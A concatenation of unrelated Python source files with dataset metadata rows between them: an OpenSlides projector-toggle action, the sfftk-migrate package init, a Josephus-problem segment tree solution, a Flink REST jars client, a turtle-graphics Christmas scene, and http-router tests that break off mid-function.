        for instance in action_data:
            # check meeting ids from projector ids and content_object
            meeting_id = instance["meeting_id"]
            fqid_content_object = string_to_fqid(instance["content_object_id"])
            assert_belongs_to_meeting(
                self.datastore,
                [fqid_content_object]
                + [
                    FullQualifiedId(Collection("projector"), id)
                    for id in instance["ids"]
                ],
                meeting_id,
            )
            for projector_id in instance["ids"]:
                stable = instance.get("stable", False)
                # Look for an existing projection of this content object on
                # this projector with the same stable flag (and type, if set).
                filter_ = And(
                    FilterOperator("current_projector_id", "=", projector_id),
                    FilterOperator(
                        "content_object_id", "=", instance["content_object_id"]
                    ),
                    FilterOperator("stable", "=", stable),
                )
                if instance.get("type"):
                    filter_ = And(
                        filter_, FilterOperator("type", "=", instance["type"])
                    )
                result = self.datastore.filter(
                    Collection("projection"), filter_, ["id"]
                )
                if result:
                    # Toggle OFF: iterating the filter result yields the ids
                    # of the matching projections.
                    projection_ids = [id_ for id_ in result]
                    if stable:
                        self.execute_other_action(
                            ProjectionDelete, [{"id": id_} for id_ in projection_ids]
                        )
                    else:
                        self.move_projections_to_history(projector_id, projection_ids)
                else:
                    # Toggle ON: build a new projection for this projector.
                    data: Dict[str, Any] = {
                        "current_projector_id": projector_id,
                        "stable": stable,
                        "type": instance.get("type"),
                        "content_object_id": instance["content_object_id"],
                        "options": instance.get("options"),
                        "meeting_id": meeting_id,
                    }
                    if not stable:
                        # An unstable projection replaces the projector's
                        # current content and resets its scroll position.
                        self.move_all_unstable_projections_to_history(
                            projector_id, meeting_id
                        )
                        yield {"id": projector_id, "scroll": 0}
                    self.execute_other_action(ProjectionCreate, [data])

    def move_projections_to_history(
        self, projector_id: int, projection_ids: List[int]
    ) -> None:
        """Detach the given projections and append them to the projector's history."""
        max_weight = self.get_max_projection_weight(projector_id)
        for projection_id in projection_ids:
            self.execute_other_action(
                ProjectionUpdate,
                [
                    {
                        "id": int(projection_id),
                        "current_projector_id": None,
                        "history_projector_id": projector_id,
                        # Keep history ordered: each moved projection goes
                        # to the end.
                        "weight": max_weight + 1,
                    }
                ],
            )
            max_weight += 1

    def get_max_projection_weight(self, projector_id: int) -> int:
        """Return the largest history weight on the projector (0 if history is empty)."""
        filter_ = FilterOperator("history_projector_id", "=", projector_id)
        maximum = self.datastore.max(Collection("projection"), filter_, "weight", "int")
        if maximum is None:
            maximum = 0
        return maximum

    def move_all_unstable_projections_to_history(
        self, projector_id: int, meeting_id: int
    ) -> None:
        """Move every unstable projection currently shown on the projector to history."""
        filter_ = And(
            FilterOperator("meeting_id", "=", meeting_id),
            FilterOperator("current_projector_id", "=", projector_id),
            FilterOperator("stable", "=", False),
        )
        result = self.datastore.filter(Collection("projection"), filter_, ["id"])
        if result:
            self.move_projections_to_history(projector_id, [int(id_) for id_ in result])
| 40.763359
| 88
| 0.548876
| 481
| 5,340
| 5.804574
| 0.2079
| 0.082736
| 0.032235
| 0.039398
| 0.230659
| 0.184814
| 0.166905
| 0.043696
| 0.043696
| 0.043696
| 0
| 0.001454
| 0.35618
| 5,340
| 130
| 89
| 41.076923
| 0.810646
| 0.016105
| 0
| 0.128205
| 0
| 0
| 0.096029
| 0
| 0
| 0
| 0
| 0
| 0.017094
| 1
| 0.034188
| false
| 0
| 0.119658
| 0
| 0.196581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c3d07f73748d2980ffa18343832a605023692e
| 3,235
|
py
|
Python
|
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | null | null | null |
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | 2
|
2020-04-02T15:25:10.000Z
|
2020-04-03T14:32:12.000Z
|
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | null | null | null |
"""
sfftk-migrate
==============
This is a simple tool to allow users to easily migrate older versions of EMDB-SFF files to the latest (supported version).
It has only one dependency: `lxml` which effects part of the migrations.
Presently it only works with XML (.sff) EMDB-SFF files.
How does it work?
-----------------
Each migration consists of two components:
1. a Python module which implements a `migrate` function, and
2. an XSL stylesheet which defines how the `source` is transformed into the `target`
The `migrate` function in (1) has the following signature:
.. code-block:: python
def migrate(infile, outfile, stylesheet, args, encoding='utf-8', **params):
...
where `infile` and `outfile` are the names of the source and target files, `stylesheet` is the
XSL file, `args` is the argument namespace, `encoding` defines what encoding the outfile will
be writing in, and `**params` is a dictionary of any params specified in the XSL file.
Please reference https://www.w3schools.com/xml/xsl_intro.asp on how XSL works.
Migrations are effected using the `migrate.do_migration` function which has the following signature:
.. code-block:: python
def do_migration(args, value_list=None, version_list=VERSION_LIST):
...
Lessons learned in using `lxml`
---------------------------------
* etree.parse() takes XML files/file objects and returns an ElementTree
* etree.XML() takes a string and returns an Element regardless of the content
* etree.ElementTree(root_element) converts an element into an ElementTree
* etree.XSLT() takes an ElementTree or Element object and returns a transformer object;
a transformer object should take an ElementTree (but seems to also take Element objects)
* the result of a transformation is an _XSLTResultTree which behaves like an ElementTree but submits to str()
from: https://lxml.de/xpathxslt.html#xslt-result-objects
It is possible to pass parameters, in the form of XPath expressions, to the XSLT template:
>>> xslt_tree = etree.XML('''\
... <xsl:stylesheet version="1.0"
... xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
... <xsl:param name="a" />
... <xsl:template match="/">
... <foo><xsl:value-of select="$a" /></foo>
... </xsl:template>
... </xsl:stylesheet>''')
>>> transform = etree.XSLT(xslt_tree)
>>> doc_root = etree.XML('<a><b>Text</b></a>')
The parameters are passed as keyword parameters to the transform call. First, let's try passing in a simple integer expression:
>>> result = transform(doc_root, a="5")
>>> str(result)
'<?xml version="1.0"?>\n<foo>5</foo>\n'
"""
import os

# Version of this package.
SFFTK_MIGRATIONS_VERSION = '0.1.0b7'

# Ordered chain of EMDB-SFF schema versions a file can be migrated through.
VERSION_LIST = [
    '0.7.0.dev0',
    '0.8.0.dev1'
]

# Base directory of this package.
# NOTE(review): a single-argument os.path.join is a no-op, so this is just
# dirname(__file__) — the name suggests it should point at test data;
# confirm intent.
TEST_DATA_PATH = os.path.join(os.path.dirname(__file__))
# Locations of the bundled XSL stylesheets and XML fixtures.
XSL = os.path.join(TEST_DATA_PATH, 'data', 'xsl')
XML = os.path.join(TEST_DATA_PATH, 'data', 'xml')
# Dotted name of the package holding the individual migration modules.
MIGRATIONS_PACKAGE = 'sfftk_migrate.migrations'
STYLESHEETS_DIR = os.path.join(os.path.dirname(__file__), 'stylesheets')

# struct-style byte-order prefixes keyed by endianness name.
ENDIANNESS = {
    "little": "<",
    "big": ">",
}
# struct format codes keyed by numpy-style dtype name.
MODE = {
    "int8": "b",
    "uint8": "B",
    "int16": "h",
    "uint16": "H",
    "int32": "i",
    "uint32": "I",
    "int64": "q",
    "uint64": "Q",
    "float32": "f",
    "float64": "d"
}
| 29.678899
| 127
| 0.678825
| 471
| 3,235
| 4.59448
| 0.428875
| 0.016636
| 0.018484
| 0.022181
| 0.0878
| 0.0878
| 0.0878
| 0.038817
| 0
| 0
| 0
| 0.017037
| 0.165379
| 3,235
| 108
| 128
| 29.953704
| 0.784444
| 0.799691
| 0
| 0
| 0
| 0
| 0.241706
| 0.037915
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c9d816a148fcaa90837526278207a3fb99ed20
| 802
|
py
|
Python
|
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
from sys import stdin as s

# Josephus problem (BOJ 1168): n people stand in a circle and every k-th
# remaining person is removed; print the removal order.
n, k = map(int, s.readline().split())
# Segment tree over positions 1..n: each leaf holds 1 while that person is
# still in the circle; internal nodes hold survivor counts (4*n capacity).
tree = [0] * 400005
def init(node, s, e):
    """Build the survivor-count segment tree over positions s..e.

    Returns the count stored at `node` (number of leaves in its range).
    """
    if s == e:
        # Leaf: one live person at this position.
        tree[node] = 1
        return 1
    mid = (s + e) >> 1
    left_count = init(2 * node, s, mid)
    right_count = init(2 * node + 1, mid + 1, e)
    tree[node] = left_count + right_count
    return tree[node]
def query(node, s, e, k):
    """Remove and return the position of the k-th survivor within s..e."""
    # Every node on the path loses one survivor.
    tree[node] -= 1
    if s == e:
        return s
    mid = (s + e) >> 1
    left_alive = tree[2 * node]
    if left_alive >= k:
        return query(2 * node, s, mid, k)
    return query(2 * node + 1, mid + 1, e, k - left_alive)
# Build the tree, then repeatedly remove every k-th remaining person,
# printing the Josephus permutation as "<p1, p2, ..., pn>".
init(1, 1, n)
x = k
print("<", end="")
for idx in range(0, n - 1):
    print("%d, " % query(1, 1, n, x), end="")
    # Advance k-1 survivors past the gap left by the removal; tree[1] is
    # the number of people still in the circle, and a remainder of 0 wraps
    # to the last survivor rather than position 0.
    x += k - 1
    if x % tree[1] == 0:
        x = tree[1]
    else:
        x %= tree[1]
print("%d" % query(1, 1, n, x), end="")
print(">")
| 19.095238
| 72
| 0.451372
| 141
| 802
| 2.567376
| 0.241135
| 0.033149
| 0.024862
| 0.033149
| 0.165746
| 0.165746
| 0.104972
| 0.104972
| 0.104972
| 0
| 0
| 0.064151
| 0.339152
| 802
| 41
| 73
| 19.560976
| 0.618868
| 0
| 0
| 0.258065
| 0
| 0
| 0.009975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.258065
| 0.129032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9d6bbb09e450702b15b4ceb0a5be3a4e585501e
| 7,237
|
py
|
Python
|
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
import ntpath
import os
from flink_rest_client.common import _execute_rest_request, RestException
class JarsClient:
    """Client for the Flink REST API's `/jars` endpoints (list/upload/run/delete)."""

    def __init__(self, prefix):
        """
        Constructor.

        Parameters
        ----------
        prefix: str
            REST API url prefix. It must contain the host, port pair.
        """
        self.prefix = f"{prefix}/jars"

    def all(self):
        """
        Returns a list of all jars previously uploaded via '/jars/upload'.

        Endpoint: [GET] /jars

        Returns
        -------
        dict
            List of all the jars that were previously uploaded.
        """
        return _execute_rest_request(url=self.prefix)

    def upload(self, path_to_jar):
        """
        Uploads a jar to the cluster from the input path. The jar's name will
        be the original filename from the input path.

        Endpoint: [POST] /jars/upload

        Parameters
        ----------
        path_to_jar: str
            Path to the jar file.

        Returns
        -------
        dict
            Result of jar upload.
        """
        filename = os.path.basename(path_to_jar)
        # BUG FIX: the file handle was previously opened and never closed
        # (resource leak). The context manager keeps it open for the
        # duration of the request and guarantees release afterwards.
        with open(path_to_jar, "rb") as jar_file:
            files = {
                "file": (filename, jar_file, "application/x-java-archive")
            }
            return _execute_rest_request(
                url=f"{self.prefix}/upload", http_method="POST", files=files
            )

    def get_plan(self, jar_id):
        """
        Returns the dataflow plan of a job contained in a jar previously
        uploaded via '/jars/upload'.

        Endpoint: [POST] /jars/:jarid/plan

        Parameters
        ----------
        jar_id: str
            String value that identifies a jar. When uploading the jar a path
            is returned, where the filename is the ID. This value is
            equivalent to the `id` field in the list of uploaded jars.

        Returns
        -------
        dict
            Details of the jar_id's plan.

        Raises
        ------
        RestException
            If the jar_id does not exist.
        """
        return _execute_rest_request(
            url=f"{self.prefix}/{jar_id}/plan", http_method="POST"
        )["plan"]

    def run(
        self,
        jar_id,
        arguments=None,
        entry_class=None,
        parallelism=None,
        savepoint_path=None,
        allow_non_restored_state=None,
    ):
        """
        Submits a job by running a jar previously uploaded via '/jars/upload'.

        Endpoint: [POST] /jars/:jarid/run

        Parameters
        ----------
        jar_id: str
            Jar identifier (the `id` field in the list of uploaded jars).
        arguments: dict
            (Optional) Dict of program arguments, sent as "--key value" pairs.
        entry_class: str
            (Optional) Fully qualified name of the entry point class.
            Overrides the class defined in the jar file manifest.
        parallelism: int
            (Optional) Positive integer specifying the desired job parallelism.
        savepoint_path: str
            (Optional) Path of the savepoint to restore the job from.
        allow_non_restored_state: bool
            (Optional) Whether the job submission should be rejected if the
            savepoint contains state that cannot be mapped back to the job.

        Returns
        -------
        str
            32-character hexadecimal string value that identifies a job.

        Raises
        ------
        RestException
            If the jar_id does not exist or parallelism is negative.
        """
        data = {}
        if arguments is not None:
            # Flatten {"key": "value"} into "--key value" pairs.
            data["programArgs"] = " ".join([f"--{k} {v}" for k, v in arguments.items()])
        if entry_class is not None:
            data["entry-class"] = entry_class
        if parallelism is not None:
            # NOTE(review): the check admits parallelism == 0 despite the
            # message asking for a positive integer; kept as-is to avoid a
            # behavior change.
            if parallelism < 0:
                # BUG FIX: the message previously blamed the wrong method
                # ("get_plan") — copy-paste error.
                raise RestException(
                    "run method's parallelism parameter must be a positive integer."
                )
            data["parallelism"] = parallelism
        if savepoint_path is not None:
            data["savepointPath"] = savepoint_path
        if allow_non_restored_state is not None:
            data["allowNonRestoredState"] = allow_non_restored_state
        return _execute_rest_request(
            url=f"{self.prefix}/{jar_id}/run", http_method="POST", json=data
        )["jobid"]

    def upload_and_run(
        self,
        path_to_jar,
        arguments=None,
        entry_class=None,
        parallelism=None,
        savepoint_path=None,
        allow_non_restored_state=None,
    ):
        """
        Helper method to upload and start a jar in one method call.

        Parameters
        ----------
        path_to_jar: str
            Path to the jar file; remaining parameters are forwarded to
            :meth:`run` unchanged (see its docstring).
        arguments: dict
        entry_class: str
        parallelism: int
        savepoint_path: str
        allow_non_restored_state: bool

        Returns
        -------
        str
            32-character hexadecimal string value that identifies a job.

        Raises
        ------
        RestException
            If an error occurred during the upload of the jar file.
        """
        result = self.upload(path_to_jar=path_to_jar)
        if not result["status"] == "success":
            raise RestException("Could not upload the input jar file.", result)
        # The upload response's `filename` is a path; its basename is the jar id.
        return self.run(
            ntpath.basename(result["filename"]),
            arguments=arguments,
            entry_class=entry_class,
            parallelism=parallelism,
            savepoint_path=savepoint_path,
            allow_non_restored_state=allow_non_restored_state,
        )

    def delete(self, jar_id):
        """
        Deletes a jar previously uploaded via '/jars/upload'.

        Endpoint: [DELETE] /jars/:jarid

        Parameters
        ----------
        jar_id: str
            Jar identifier (the `id` field in the list of uploaded jars).

        Returns
        -------
        bool
            True, if jar_id has been successfully deleted, otherwise False.

        Raises
        ------
        RestException
            If the jar_id does not exist.
        """
        res = _execute_rest_request(url=f"{self.prefix}/{jar_id}", http_method="DELETE")
        # An empty response body signals success (same test as the old
        # if/else that returned True/False).
        return len(res.keys()) < 1
| 30.92735
| 120
| 0.579107
| 853
| 7,237
| 4.793669
| 0.208675
| 0.017119
| 0.033015
| 0.041086
| 0.567865
| 0.561262
| 0.551724
| 0.551724
| 0.531915
| 0.497921
| 0
| 0.001257
| 0.340473
| 7,237
| 233
| 121
| 31.060086
| 0.855437
| 0.493298
| 0
| 0.232877
| 0
| 0
| 0.134848
| 0.044705
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09589
| false
| 0
| 0.041096
| 0
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9da4c23e10982ade2cffc9ff31b496b0afdcefd
| 2,320
|
py
|
Python
|
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | 1
|
2020-04-14T08:31:24.000Z
|
2020-04-14T08:31:24.000Z
|
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | null | null | null |
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | 1
|
2021-01-05T15:47:59.000Z
|
2021-01-05T15:47:59.000Z
|
from turtle import *
from random import *
# from random import *
def move(x, y):
    """Lift the pen, jump to (x, y), and lower it again (no line drawn)."""
    penup()
    goto(x, y)
    pendown()
def fillpolygon(side, count, color1, color2):
    """Draw a filled regular polygon with `count` sides of length `side`.

    `color1` is the fill colour, `color2` the outline colour.
    """
    pencolor(color2)
    fillcolor(color1)
    begin_fill()
    turn = 360 / count
    for _ in range(count):
        forward(side)
        left(turn)
    end_fill()
def christmas_tree(size, xStart, yStart):
    """Draw a christmas tree at (xStart, yStart): a square trunk topped by
    three stacked triangles of foliage.

    The dead commented-out fifth-polygon code (a no-op triple-quoted string)
    has been removed.
    """
    move(xStart, yStart)
    # Trunk.
    fillpolygon(size, 4, "brown", "black")
    # Step up on top of the trunk before drawing foliage.
    left(90)
    forward(size)
    right(90)
    backward(size)
    # Two lower foliage layers, each shifted upward between draws.
    for g in range(2):
        fillpolygon(size * 3, 3, "lightgreen", "green")
        left(60)
        forward(size * 2)
        right(60)
        backward(size)
    # Top foliage layer.
    fillpolygon(size * 3, 3, "lightgreen", "green")
def treesLine(side, minX, y, count, distBetw):
    """Draw a row of `count` christmas trees starting at minX, spaced distBetw apart."""
    for idx in range(count):
        christmas_tree(side, minX + distBetw * idx, y)
def star(side, mainColor, fillColor, x, y):
    """Draw a filled five-pointed star anchored at (x, y)."""
    move(x, y)
    pencolor(mainColor)
    fillcolor(fillColor)
    begin_fill()
    # Tilt before tracing; five 144-degree turns trace the star's points.
    left(107)
    for count in range(5):
        forward(side)
        left(144)
    # NOTE: the pen is left up here; move() lowers it again before other shapes.
    penup()
    # Undo the initial tilt so later drawing is unaffected.
    right(107)
    end_fill()
def starLine(side, minX, y, count, distBetw):
    """Draw a horizontal row of `count` yellow stars spaced `distBetw` apart."""
    for idx in range(count):
        star(side, "yellow", "yellow", minX + distBetw * idx, y)
def moon(radius, color, minX, minY, maxX, maxY):
    """Draw a dot of the given radius/colour at a random point inside the box."""
    x = randint(minX, maxX)
    y = randint(minY, maxY)
    move(x, y)
    dot(radius, color)
def frame(x1, y1, x2, y2, color):
    """Draw a thick rectangular border with corners (x1, y1) and (x2, y2)."""
    pensize(10)
    pencolor(color)
    move(x1, y1)
    # Walk the remaining three corners and close back at the start.
    for corner_x, corner_y in ((x1, y2), (x2, y2), (x2, y1), (x1, y1)):
        goto(corner_x, corner_y)
def writeline(line, color):
    """Write `line` above the current position.

    Restored from dead code: the function had been commented out with a
    triple-quoted string while the call at the bottom of the script remained,
    so the script crashed with a NameError.
    """
    pencolor(color)
    left(90)
    penup()
    forward(55)
    left(90)
    forward(30)
    write(line)


# Scene: gray sky, a moon, a frame, three rows of stars and three rows of trees.
bgcolor("gray")
speed(0)
moon(200, "white", -925, 300, 900, 400)
frame(-950, -490, 950, 500, "darkorange")
pensize(3)
starLine(40, -900, 450, 15, 120)
starLine(40, -900, 380, 13, 150)
starLine(40, -900, 300, 15, 120)
treesLine(20, -900, 100, 23, 80)
treesLine(20, -700, -100, 18, 80)
treesLine(20, -900, -300, 23, 80)
writeline("Merry Christmas!", "darkblue")
| 21.886792
| 56
| 0.563793
| 305
| 2,320
| 4.268852
| 0.347541
| 0.010753
| 0.013825
| 0.033794
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0
| 0.101511
| 0.286638
| 2,320
| 105
| 57
| 22.095238
| 0.685196
| 0.009914
| 0
| 0.246575
| 0
| 0
| 0.049223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109589
| false
| 0
| 0.027397
| 0
| 0.136986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9db9333dcabf339b75e8e3dafb52fedc14104d7
| 9,713
|
py
|
Python
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | 11
|
2020-11-10T15:12:58.000Z
|
2022-01-24T13:14:53.000Z
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | 2
|
2021-05-01T13:59:14.000Z
|
2022-03-09T20:45:02.000Z
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | null | null | null |
"""HTTP Router tests."""
import inspect
import typing as t
from re import compile as re
import pytest
@pytest.fixture
def router():
    """Provide a fresh Router instance for each test."""
    from http_router import Router, NotFound, MethodNotAllowed, RouterError # noqa
    return Router()
def test_router_basic(router):
    """A fresh router exposes its exceptions/flags; trim_last_slash is mutable."""
    assert router
    assert not router.trim_last_slash
    assert router.validator
    assert router.NotFound
    assert router.RouterError
    assert router.MethodNotAllowed
    router.trim_last_slash = True
    assert router.trim_last_slash
def test_router_route_re(router):
    """Compiled-regex routes: unanchored matching, named groups become params."""
    router.route(re('test.jpg'))('test1 passed')
    assert router('test.jpg').target == 'test1 passed'
    # '.' is unescaped and the pattern unanchored, so these match as well.
    assert router('testAjpg').target == 'test1 passed'
    assert router('testAjpg/regex/can/be/dangerous').target == 'test1 passed'
    # Unnamed groups do not produce params.
    router.route(re(r'params/(\w+)'))('test2 passed')
    match = router('params/mike')
    assert match
    assert not match.params
    # Named groups do.
    router.route(re(r'params2/(?P<User>\w+)'))('test3 passed')
    match = router('params2/mike')
    assert match
    assert match.params == {'User': 'mike'}
def test_router_route_str(router):
    """String routes: exact paths and {param[:type]} placeholders."""
    router.route('test.jpg')(True)
    match = router('test.jpg')
    assert match
    with pytest.raises(router.NotFound):
        router('test.jpeg')
    router.route('/any/{item}')(True)
    match = router('/any/test')
    assert match
    assert match.params == {'item': 'test'}
    router.route('/str/{item:str}')(True)
    match = router('/str/42')
    assert match
    assert match.params == {'item': '42'}
    # The :int converter yields an int param, not a string.
    router.route('/int/{item:int}')(True)
    match = router('/int/42')
    assert match
    assert match.params == {'item': 42}
    router.route(r'/regex/{item:\d{3}}')(True)
    match = router('/regex/422')
    assert match
    assert match.params == {'item': '422'}
def test_parse_path():
    """parse_path returns (path, regex, params) for plain and dynamic paths."""
    from http_router.utils import parse_path
    assert parse_path('/') == ('/', None, {})
    assert parse_path('/test.jpg') == ('/test.jpg', None, {})
    # An unclosed brace is treated as a literal path.
    assert parse_path('/{foo') == ('/{foo', None, {})
    path, regex, params = parse_path(r'/{foo}/')
    assert isinstance(regex, t.Pattern)
    assert regex.pattern == r'^/(?P<foo>[^/]+)/$'
    assert path == '/{foo}/'
    assert params == {'foo': str}
    path, regex, params = parse_path(r'/{foo:int}/')
    assert isinstance(regex, t.Pattern)
    assert regex.pattern == r'^/(?P<foo>\d+)/$'
    assert path == '/{foo}/'
    assert params == {'foo': int}
    # A pre-compiled pattern is passed through with empty params.
    path, regex, params = parse_path(re(r'/(?P<foo>\d{1,3})/'))
    assert isinstance(regex, t.Pattern)
    assert params == {}
    assert path
    # Whitespace and inline regex inside placeholders are accepted.
    path, regex, params = parse_path(r'/api/v1/items/{item:str}/subitems/{ subitem:\d{3} }/find')
    assert path == '/api/v1/items/{item}/subitems/{subitem}/find'
    assert regex.match('/api/v1/items/foo/subitems/300/find')
    assert params['item']
    assert params['subitem']
def test_route():
    """Route stores its methods set and matches on path + method."""
    from http_router.routes import Route
    route = Route('/only-post', {'POST'}, None)
    assert route.methods
    assert route.match('/only-post', 'POST')
    assert not route.match('/only-post', '')
    # An empty methods set means no method restriction is recorded.
    route = Route('/only-post', set(), None)
    assert not route.methods
def test_dynamic_route():
    """DynamicRoute converts typed params and accepts compiled regexes."""
    from http_router.routes import DynamicRoute
    route = DynamicRoute(r'/order/{id:int}', set(), None)
    match = route.match('/order/100', '')
    assert match
    assert match.params == {'id': 100}
    match = route.match('/order/unknown', '')
    assert not match
    assert not match.params
    route = DynamicRoute(re('/regex(/opt)?'), set(), None)
    match = route.match('/regex', '')
    assert match
    match = route.match('/regex/opt', '')
    assert match
def test_router():
    """Base tests: registration, methods, dynamic params, decorator usage."""
    from http_router import Router
    router = Router(trim_last_slash=True)
    with pytest.raises(router.RouterError):
        router.route(lambda: 12)
    with pytest.raises(router.NotFound):
        assert router('/unknown')
    router.route('/', '/simple')('simple')
    match = router('/', 'POST')
    assert match.target == 'simple'
    assert not match.params
    match = router('/simple', 'DELETE')
    assert match.target == 'simple'
    assert not match.params
    # Method names are upper-cased on registration.
    router.route('/only-post', methods='post')('only-post')
    assert router.plain['/only-post'][0].methods == {'POST'}
    with pytest.raises(router.MethodNotAllowed):
        assert router('/only-post')
    match = router('/only-post', 'POST')
    assert match.target == 'only-post'
    assert not match.params
    # Whitespace inside placeholders is ignored.
    router.route('/dynamic1/{id}')('dyn1')
    router.route('/dynamic2/{ id }')('dyn2')
    match = router('/dynamic1/11/')
    assert match.target == 'dyn1'
    assert match.params == {'id': '11'}
    match = router('/dynamic2/22/')
    assert match.target == 'dyn2'
    assert match.params == {'id': '22'}
    @router.route(r'/hello/{name:str}', methods='post')
    def hello():
        return 'hello'
    match = router('/hello/john/', 'POST')
    assert match.target() == 'hello'
    assert match.params == {'name': 'john'}
    # Extra keyword args to route() become call kwargs for the target.
    @router.route('/params', var='value')
    def params(**opts):
        return opts
    match = router('/params', 'POST')
    assert match.target() == {'var': 'value'}
    assert router.routes()
    assert router.routes()[0].path == ''
def test_mounts():
    """A Mount nests a router under a path prefix; subrouters take precedence."""
    from http_router import Router
    from http_router.routes import Mount
    router = Router()
    route = Mount('/api/', set(), router)
    # The trailing slash is stripped from the mount path.
    assert route.path == '/api'
    match = route.match('/api/e1', '')
    assert not match
    router.route('/e1')('e1')
    match = route.match('/api/e1', 'UNKNOWN')
    assert match
    assert match.target == 'e1'
    root = Router()
    subrouter = Router()
    root.route('/api')(1)
    root.route(re('/api/test'))(2)
    root.route('/api')(subrouter)
    subrouter.route('/test')(3)
    # The mounted subrouter wins over the earlier regex route.
    assert root('/api').target == 1
    assert root('/api/test').target == 3
def test_trim_last_slash():
    """trim_last_slash makes '/path' and '/path/' interchangeable."""
    from http_router import Router
    router = Router()
    router.route('/route1')('route1')
    router.route('/route2/')('route2')
    assert router('/route1').target == 'route1'
    assert router('/route2/').target == 'route2'
    with pytest.raises(router.NotFound):
        assert not router('/route1/')
    with pytest.raises(router.NotFound):
        assert not router('/route2')
    router = Router(trim_last_slash=True)
    router.route('/route1')('route1')
    router.route('/route2/')('route2')
    assert router('/route1').target == 'route1'
    assert router('/route2/').target == 'route2'
    assert router('/route1/').target == 'route1'
    assert router('/route2').target == 'route2'
def test_validator():
    """A validator rejects invalid targets at registration time."""
    from http_router import Router
    # The router only accepts async functions
    router = Router(validator=inspect.iscoroutinefunction)
    with pytest.raises(router.RouterError):
        router.route('/', '/simple')(lambda: 'simple')
def test_converter():
    """A converter wraps every target at registration time."""
    from http_router import Router
    # Wrap each registered target so calling it returns (call_arg, original_target).
    router = Router(converter=lambda v: lambda r: (r, v))
    router.route('/')('simple')
    match = router('/')
    assert match.target('test') == ('test', 'simple')
def test_custom_route():
    """A target may customise its own registration via a __route__ classmethod."""
    from http_router import Router
    class View:
        # Lower-case method names; upper-cased by the router on binding.
        methods = 'get', 'post'
        def __new__(cls, *args, **kwargs):
            """Init the class and call it."""
            self = super().__new__(cls)
            return self(*args, **kwargs)
        @classmethod
        def __route__(cls, router, *paths, **params):
            return router.bind(cls, *paths, methods=cls.methods)
    # __route__ controls the binding, so the class itself becomes the target.
    router = Router()
    router.route('/')(View)
    assert router.plain['/'][0].methods == {'GET', 'POST'}
    match = router('/')
    assert match.target is View
def test_nested_routers():
    """A router registered as a target serves requests under its prefix."""
    from http_router import Router
    child = Router()
